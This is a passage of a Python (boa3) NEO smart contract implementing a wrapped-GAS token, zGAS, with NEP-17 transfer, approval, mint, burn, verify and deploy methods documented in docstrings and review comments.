    # skip balance changes if transferring to yourself or transferring 0 cryptocurrency
    if from_address != to_address and amount != 0:
        # remove the sender's storage entry entirely when its balance drops to zero
        if from_balance == amount:
            delete(from_address)
        else:
            put(from_address, from_balance - amount)
        to_balance = get(to_address).to_int()
        put(to_address, to_balance + amount)
    # the Transfer event fires even for no-op transfers (amount 0 / self-transfer), per NEP-17
    on_transfer(from_address, to_address, amount)
    # if the receiver is a deployed contract, it must be notified through onNEP17Payment
    post_transfer(from_address, to_address, amount, data, True)
    # and then it must return true
    return True
@public
def approve(spender: UInt160, amount: int) -> bool:
    """
    Allows spender to spend from your account as many times as they want until it reaches the amount allowed.

    The allowed amount will be overwritten if this method is called once more.

    :param spender: the address that will be allowed to use your zGAS
    :type spender: UInt160
    :param amount: the total amount of zGAS that the spender can spend
    :type amount: int
    :return: True when the allowance was recorded; False when the caller's
        balance is lower than `amount`.
    :raise AssertionError: raised if `spender` length is not 20 or if `amount` is less than zero.
    """
    assert len(spender) == 20
    assert amount >= 0
    # NOTE(review): the allowance owner here is calling_script_hash (the calling
    # contract), not a witness-checked user account — presumably intended for
    # contract-to-contract approvals; confirm this matches the expected callers.
    # Approval is only granted when the owner currently holds at least `amount`.
    if balanceOf(calling_script_hash) >= amount:
        put(ALLOWANCE_PREFIX + calling_script_hash + spender, amount)
        on_approval(calling_script_hash, spender, amount)
        return True
    return False
@public
def allowance(owner: UInt160, spender: UInt160) -> int:
    """
    Reads how many zGAS tokens the spender may still withdraw from the owner.

    :param owner: the address that granted the spender permission to spend zGAS
    :type owner: UInt160
    :param spender: the address allowed to spend zGAS from the owner's account
    :type spender: UInt160
    :return: the remaining approved amount (0 when no allowance exists).
    """
    stored_allowance = get(ALLOWANCE_PREFIX + owner + spender)
    return stored_allowance.to_int()
def post_transfer(from_address: Union[UInt160, None], to_address: Union[UInt160, None], amount: int, data: Any, call_onPayment: bool):
    """
    Checks if the one receiving NEP17 tokens is a smart contract and if it's one the onPayment method will be called.

    :param from_address: the address of the sender (None when minting)
    :type from_address: UInt160
    :param to_address: the address of the receiver (None when burning)
    :type to_address: UInt160
    :param amount: the amount of cryptocurrency that is being sent
    :type amount: int
    :param data: any pertinent data that might validate the transaction
    :type data: Any
    :param call_onPayment: whether onPayment should be called or not
    :type call_onPayment: bool
    """
    if call_onPayment:
        # boa3 quirk: isinstance(x, None) is this compiler's None-check idiom
        if not isinstance(to_address, None):  # TODO: change to 'is not None' when `is` semantic is implemented
            # get_contract yields None when to_address is not a deployed contract
            contract = get_contract(to_address)
            if not isinstance(contract, None):  # TODO: change to 'is not None' when `is` semantic is implemented
                call_contract(to_address, 'onNEP17Payment', [from_address, amount, data])
def mint(account: UInt160, amount: int):
    """
    Creates new zGAS tokens and credits them to an account.

    Called when GAS arrives at this contract: bumps the global supply counter
    and the receiving account's balance, fires the NEP-17 Transfer event with
    a null sender, and notifies the receiver if it is a contract.

    :param account: the address of the account that is sending cryptocurrency to this contract
    :type account: UInt160
    :param amount: the amount of gas to be refunded
    :type amount: int
    :raise AssertionError: raised if amount is less than 0
    """
    assert amount >= 0
    if amount == 0:
        return
    new_supply = totalSupply() + amount
    new_balance = balanceOf(account) + amount
    put(SUPPLY_KEY, new_supply)
    put(account, new_balance)
    # NEP-17 convention: minting is reported as a transfer from a null address
    on_transfer(None, account, amount)
    post_transfer(None, account, amount, None, True)
@public
def burn(account: UInt160, amount: int):
    """
    Burns zGAS tokens and sends the equivalent amount of native GAS back to the account.

    :param account: the address of the account that is pulling out cryptocurrency of this contract
    :type account: UInt160
    :param amount: the amount of gas to be refunded
    :type amount: int
    :raise AssertionError: raised if `account` length is not 20, amount is less than 0 or the account doesn't have
    enough zGAS to burn
    """
    assert len(account) == 20
    assert amount >= 0
    # only the account owner (transaction witness) may burn; silently no-op otherwise
    if check_witness(account):
        if amount != 0:
            current_total_supply = totalSupply()
            account_balance = balanceOf(account)
            # the account must hold at least the amount being burned
            assert account_balance >= amount
            put(SUPPLY_KEY, current_total_supply - amount)
            # remove the storage entry entirely when the balance drops to zero
            if account_balance == amount:
                delete(account)
            else:
                put(account, account_balance - amount)
            # NEP-17 convention: burning is reported as a transfer to a null address
            on_transfer(account, None, amount)
            post_transfer(account, None, amount, None, False)
            # refund: transfer native GAS held by this contract back to the account
            call_contract(GAS, 'transfer', [executing_script_hash, account, amount, None])
@public
def verify() -> bool:
    """
    Verification trigger for transactions signed with this contract's address.

    Invoked as a VerificationTrigger (e.g. when withdrawing tokens from the
    contract) to decide whether the signature is valid.

    :return: True when the contract owner has witnessed the transaction.
    """
    owner_signed = check_witness(OWNER)
    return owner_signed
@public
def deploy() -> bool:
    """
    One-time storage initialization run when the smart contract is deployed.

    Records the full token supply and assigns it to the owner's balance.

    :return: whether the deploy was successful. This method must return True only during the smart contract's deploy.
    """
    # only the owner may initialize, and only while the supply is still unset;
    # the witness check runs first so the storage read happens only when needed
    if not check_witness(OWNER) or get(SUPPLY_KEY).to_int() > 0:
        return False
    put(SUPPLY_KEY, TOKEN_TOTAL_SUPPLY)
    put(OWNER, TOKEN_TOTAL_SUPPLY)
    on_transfer(None, OWNER, TOKEN_TOTAL_SUPPLY)
    return True
@public
def onNEP17Payment(from_address: UInt160, amount: int, data: Any):
    """
    NEP-17 payment hook: wraps incoming GAS by minting an equal amount of zGAS.

    Any token other than native GAS is rejected by aborting the transaction.

    :param from_address: the address of the one who is trying to send cryptocurrency to this smart contract
    :type from_address: UInt160
    :param amount: the amount of cryptocurrency that is being sent to the this smart contract
    :type amount: int
    :param data: any pertinent data that might validate the transaction
    :type data: Any
    """
    # the caller's script hash identifies which token contract sent the payment
    if calling_script_hash != GAS:
        abort()
    mint(from_address, amount)